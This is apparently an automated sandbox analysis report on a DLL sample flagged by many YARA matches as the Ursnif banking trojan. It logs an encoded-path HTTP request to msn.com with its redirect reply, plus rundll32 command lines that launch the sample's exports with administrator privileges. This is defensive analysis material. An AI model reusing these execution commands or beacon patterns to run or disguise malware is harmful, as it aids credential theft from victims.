                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:37:39 UTC12OUTGET /mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: msn.com
                                                                                                                                                                      2021-10-11 20:37:39 UTC13INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Location: https://www.msn.com/mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre
                                                                                                                                                                      Server: Microsoft-IIS/8.5
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:37:39 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 379
                                                                                                                                                                      2021-10-11 20:37:39 UTC13INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 79 74 42 5a 65 6f 6d 4e 71 56 2f 48 53 66 53 5f 32 46 37 35 75 31 5f 32 42 67 7a 75 2f 66 77 33 54 39 6e 55 47 71 74 79 41 2f 4d 6e 4d 63 34 39 45 77 31 62 55 2f 54 52 37 35 42 4e 67 33 74 35 77 4b 5f 32 2f 46 5a 5f 32 42 68 48 70 52 48 6a 61 6f 69 4f 57 73 4a 43 64 6d 2f 49 50 37 42 7a 71 4c 33 6b 66 4f 49 77 45 70 64 2f 30 76 36 76 41 6b 31 58
                                                                                                                                                                      Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1X


                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:21
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
                                                                                                                                                                      Imagebase:0xdc0000
                                                                                                                                                                      File size:893440 bytes
                                                                                                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:21
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                                                                                                                                                                      Imagebase:0x870000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:22
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:22
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:26
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:34
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:36:04
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 636
                                                                                                                                                                      Imagebase:0x3b0000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:36:05
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 636
                                                                                                                                                                      Imagebase:0x3b0000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:36:10
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 640
                                                                                                                                                                      Imagebase:0x3b0000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis

                                                                                                                                                                      Reset < >